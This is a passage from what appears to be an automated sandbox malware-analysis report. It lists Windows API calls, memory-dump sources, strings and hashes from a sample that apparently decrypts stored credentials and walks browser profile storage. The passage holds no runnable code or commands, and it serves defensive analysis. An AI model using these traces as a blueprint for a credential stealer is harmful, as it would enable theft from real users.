                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 005340CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 005340DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005340E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00534113
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: dc691e55f4d3750ee2c60a29feda59736ac3421c23f750ed1f1fac33aab27148
                          • Instruction ID: 504ad92bae2ece1a33cfd9e3446b0a0d34ae844d3d86cb1e3d769a76b46c4a87
                          • Instruction Fuzzy Hash: F0015A74600209BBDB10CFA5DC89BABBBADEF85311F108059BE0897250EB71E940CBA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0053A3D0,000000FF), ref: 00532B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00532B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0053A3D0,000000FF), ref: 00532BA2
                          • wsprintfA.USER32 ref: 00532BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 1f316a6488a09349cb9aebe872067f6ff4204ca35a182eda46e90d7dbb23e3e9
                          • Instruction ID: 1b7643e17eeb9079fe3ddff1c2f66f85b744288ca44f315eb8f3c53b6a14591e
                          • Instruction Fuzzy Hash: 3E014CB6904129ABCB149BC9DD45BBFB7BCFB4DB11F00421AFA05A2290E7BC5840C7B5
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00519B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00519B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00519B61
                          • LocalFree.KERNEL32 ref: 00519B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: ee6d4f2ff0d792ab250af0fdcdf02179e26de41b240784d0a1e542dccc65f8ab
                          • Instruction ID: bf33360c41605aab87866f8e3833f8bdbb6201121a66dec045f276d539c0d8b9
                          • Instruction Fuzzy Hash: ACF01D743483126BF7305F64AC59F977BA8EF05B50F200115FA45EA2D0D7B49C80CAA8
                          APIs
                          • CoCreateInstance.COMBASE(0053B110,00000000,00000001,0053B100,?), ref: 0052CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0052CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0052CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: 1fd256e973911b034c20374d2c0e1ed6f5463e6842ea6026c28108b76d0dd423
                          • Instruction ID: b23f65c9a0850bf02e124e8b52e3eae7b23b7323204c0aada455fb7e84c23a99
                          • Instruction Fuzzy Hash: 9B316671A40229AFD710DB94CC86F9E7BB9AF89B10F104184FA04EB2D0D7B1AE45CB90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00519B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00519BB3
                          • LocalFree.KERNEL32(?), ref: 00519BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 9b1e119a9ce34374e97dfef291467505e6074db83ba0471dc0ee0a46c0099fce
                          • Instruction ID: 001738f37d574a792c73e8ef14c344f9fa68f8b8d2b7a18cee4df6c830a214b7
                          • Instruction Fuzzy Hash: 42011279E4520AABE710DBA4DC55FAFB778EB84700F104555EA04AB380D7749900C7D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7\v$<!SZ$}7<w
                          • API String ID: 0-995886960
                          • Opcode ID: 5adbc6a0e53cf275bc4f66e0ca7ddd9f268d861785324f8b27fcc9702fe161d5
                          • Instruction ID: d36b9d3b68f12377040f55565669939f8910fad63b5c877df33a2d383f51c17b
                          • Instruction Fuzzy Hash: AB22F3F36086109FE304AE2DEC9177AB7E9EF94720F1A893DE6C5C7740E63558118693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: w}|$z3Iw
                          • API String ID: 0-1710186478
                          • Opcode ID: c8589fe7c2af7e16b47a856f721bbf7a268feccd0e12bcb379b62a122ddc901f
                          • Instruction ID: ce1f80fb496bc8f8eb5ba8a925bc9b14764bf8bde82e26b0cf402505cb4b0e42
                          • Instruction Fuzzy Hash: E942E4F36082049FE304AE2DDC8567AFBE9EF94720F1A493DE6C5C3744EA3598058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N/[g
                          • API String ID: 0-3808919979
                          • Opcode ID: 6451233e9fa748997aad76e3e91810add5d31355493b99cb6bfa50515c6affa7
                          • Instruction ID: d5434ab805e8665b50c05aa476833e54dfa30bfbb6f0994f974d8e9194c09fb7
                          • Opcode Fuzzy Hash: 6451233e9fa748997aad76e3e91810add5d31355493b99cb6bfa50515c6affa7
                          • Instruction Fuzzy Hash: 43516BF37083049FE3085E2DEC9573ABBDAEBD8720F16863CE685C7784EA3559018656
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ~._s
                          • API String ID: 0-1817707076
                          • Opcode ID: a94c1f480fee412020bb18e3ccdc94a3c76d50d8dac0ad6ea3ef49b164c1eb9e
                          • Instruction ID: 383b157e171099b42f2f3611ba9a85cc3eee50bf962f5e81cd8966b75e485dc3
                          • Opcode Fuzzy Hash: a94c1f480fee412020bb18e3ccdc94a3c76d50d8dac0ad6ea3ef49b164c1eb9e
                          • Instruction Fuzzy Hash: F35117F26082049FF308AE39EC9577ABBD6EB44320F15453DEBC1C2784E97594458686
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 149c6505cea1e12aa68f6f07e88fdf2d2d832ce92d85607f238be6c780c8d0cf
                          • Instruction ID: c319e2172daba249b83238bdd0e8803acf3bb5debfc5da8536b16a92c8516dca
                          • Opcode Fuzzy Hash: 149c6505cea1e12aa68f6f07e88fdf2d2d832ce92d85607f238be6c780c8d0cf
                          • Instruction Fuzzy Hash: 2F5138B3A182005FF3046E29DC9937AB7D6EF94320F2A493DE6C5C3384E97D58468756
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f34f14b7a93dd17380044be89bb2332eda1dc19dbcb1037231b9a3e202054b72
                          • Instruction ID: 9ea059e41c7061390f5a20e93433f8e8e3e002ad5921f76db9b22f819623c803
                          • Opcode Fuzzy Hash: f34f14b7a93dd17380044be89bb2332eda1dc19dbcb1037231b9a3e202054b72
                          • Instruction Fuzzy Hash: DD5129B3B092245BE3089978DC857B773DADBC4360F1A863DEE85D7748E8755C0682E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec005bcadb1e5fc41a01b8a80ac3f300af486a27afba74889d05002a24620cab
                          • Instruction ID: 4361ae91fd480483ff627688e40e1971825addac575db6f7bb5cc86cd6ea5615
                          • Opcode Fuzzy Hash: ec005bcadb1e5fc41a01b8a80ac3f300af486a27afba74889d05002a24620cab
                          • Instruction Fuzzy Hash: D84199F3E052201BE318593DED6577BB79ADBC4670F2B823DDE8593788E8295C0542D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e11eafe85294c24a7c5226ef9d31a1e008e95be0acf5ac2767e52c14c89c4505
                          • Instruction ID: 78a3580d90650acd33553a05dd6c5a5c2238473108032ab2a728f672ba56242e
                          • Opcode Fuzzy Hash: e11eafe85294c24a7c5226ef9d31a1e008e95be0acf5ac2767e52c14c89c4505
                          • Instruction Fuzzy Hash: 3A51BDB350C704DFD304AE29D88573AF7E4EB98710F228D2DDACA87600E37958519B87
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3f0ef69e1773064707e7e78baa675f5624c825b1f7f589417f77cbd8793472
                          • Instruction ID: ebc18949fd1e9835b5b603494754dad041db47111a8a1e19567dd49c76e6100d
                          • Opcode Fuzzy Hash: 4f3f0ef69e1773064707e7e78baa675f5624c825b1f7f589417f77cbd8793472
                          • Instruction Fuzzy Hash: 804127F3A0C304AFE3596E28DC8177BB7D9EB54320F160A3DEAD9D3740E93958008686
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b14fa1ebbfc6da2c8390cef140fb170c1be33e3238c7b0af08be91576fcbe27
                          • Instruction ID: 2bee0f41eecca5944394c91ebc0cfb619123cc51f66b2a41f394bf68076b5e5e
                          • Opcode Fuzzy Hash: 1b14fa1ebbfc6da2c8390cef140fb170c1be33e3238c7b0af08be91576fcbe27
                          • Instruction Fuzzy Hash: F9313AF36186104FE748AE3DDC8A336BBD6EBD4310F14C62DE6C5C638CE93448058685
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51f90a903a9067e9b48ae15e59222d193bf38ea7a3745bf08aa4a1bc0aea2406
                          • Instruction ID: 2ade8e565e4651694703581c8eafd006351b117a1c7e8d2d4f41e4b3a1abc922
                          • Opcode Fuzzy Hash: 51f90a903a9067e9b48ae15e59222d193bf38ea7a3745bf08aa4a1bc0aea2406
                          • Instruction Fuzzy Hash: 631104B290C214ABD70C6D289E3667B77DDDB08320F16092FB987D7380EC655C5093C6
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00528636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 005286AA
                          • StrStrA.SHLWAPI(?,011ADA20), ref: 005286CF
                          • lstrcpyn.KERNEL32(007493D0,?,00000000), ref: 005286EE
                          • lstrlen.KERNEL32(?), ref: 00528701
                          • wsprintfA.USER32 ref: 00528711
                          • lstrcpy.KERNEL32(?,?), ref: 00528727
                          • StrStrA.SHLWAPI(?,011ADE58), ref: 00528754
                          • lstrcpy.KERNEL32(?,007493D0), ref: 005287B4
                          • StrStrA.SHLWAPI(?,011ADCD8), ref: 005287E1
                          • lstrcpyn.KERNEL32(007493D0,?,00000000), ref: 00528800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 7555589b2749b4ace4eefef0cea55de7ba990aecc90064e37be462e126b2f260
                          • Instruction ID: ea72d987f461fe19157ba0f6a4cdbb67084896c77619edb3396e2da3c2535285
                          • Opcode Fuzzy Hash: 7555589b2749b4ace4eefef0cea55de7ba990aecc90064e37be462e126b2f260
                          • Instruction Fuzzy Hash: 9AF18C75901119AFDB10DFA4ED48AEF7BB9FF89300F008655EA09A7250DB34AE44CFA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511F9F
                          • lstrlen.KERNEL32(011A8A20), ref: 00511FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00511FE3
                          • lstrlen.KERNEL32(00541794), ref: 00511FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051200E
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00512042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051204D
                          • lstrlen.KERNEL32(00541794), ref: 00512058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512075
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00512081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005120AC
                          • lstrlen.KERNEL32(?), ref: 005120E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512104
                          • lstrcat.KERNEL32(00000000,?), ref: 00512112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512139
                          • lstrlen.KERNEL32(00541794), ref: 0051214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051216B
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00512177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005121A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005121D4
                          • lstrlen.KERNEL32(?), ref: 005121EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00512218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512242
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051227F
                          • lstrlen.KERNEL32(011ACF20), ref: 0051228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005122B1
                          • lstrcat.KERNEL32(00000000,011ACF20), ref: 005122B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005122F7
                          • lstrcat.KERNEL32(00000000), ref: 00512304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00512356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005123BF
                          • DeleteFileA.KERNEL32(00000000), ref: 005123F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00512444
                          • FindClose.KERNEL32(00000000), ref: 00512453
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: b33f8df9e323007932727e500d910fd335c045acb404d5125b3688b6d6cbd323
                          • Instruction ID: 9bc3550fba1c2657b94e8ebba14840690df58f6575a87a87b86e51ad9593de87
                          • Opcode Fuzzy Hash: b33f8df9e323007932727e500d910fd335c045acb404d5125b3688b6d6cbd323
                          • Instruction Fuzzy Hash: ABE16C35A1160A9BEB21EFB4DC89AEE7BB9BF45300F044025F905A7211DB38DDD5CBA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526445
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005264AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005264E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: be6a4f1ee4aa88cfb6f48bc564f1ea4f861d8e329627d83726042842ff63ec61
                          • Instruction ID: c2d0546b8a51b279c8f56938a25f354f91e2adf64c8de4ad39313f1c5795d4f6
                          • Opcode Fuzzy Hash: be6a4f1ee4aa88cfb6f48bc564f1ea4f861d8e329627d83726042842ff63ec61
                          • Instruction Fuzzy Hash: 0DF18274A112269BEB21EF78E849AAE7FB5BF46300F048165F845D7291DB38DC85CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005243A3
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005243D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 005243FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00524414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0052443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524498
                          • lstrcpy.KERNEL32(00000000,?), ref: 005244D7
                          • lstrcat.KERNEL32(00000000,?), ref: 005244DF
                          • lstrlen.KERNEL32(00541794), ref: 005244EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524507
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00524513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0052451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00524547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 005245A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 005245A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052467B
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005246AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 213fb01b6bfd3a835c5580bf204ba2da8cd277b4d57b4cdcd35bdbe97b8d2c3d
                          • Instruction ID: 4d2074b4781d197ed7ff4abba3e8e108e5da38aa10a6d71aaa898c6306d6099f
                          • Opcode Fuzzy Hash: 213fb01b6bfd3a835c5580bf204ba2da8cd277b4d57b4cdcd35bdbe97b8d2c3d
                          • Instruction Fuzzy Hash: 28B17031A116279BEB21EF78EC49AAF7FA9BF42700F045124B845E7291DB74DC918F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005257D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00525804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00525868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005258C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005258D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005258F8
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00525961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525988
                          • lstrlen.KERNEL32(00541794), ref: 0052599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005259B9
                          • lstrcat.KERNEL32(00000000,00541794), ref: 005259C5
                          • lstrlen.KERNEL32(011ACFC8), ref: 005259D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005259F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00525A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00525A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525BB5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00525BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00525C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00525C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
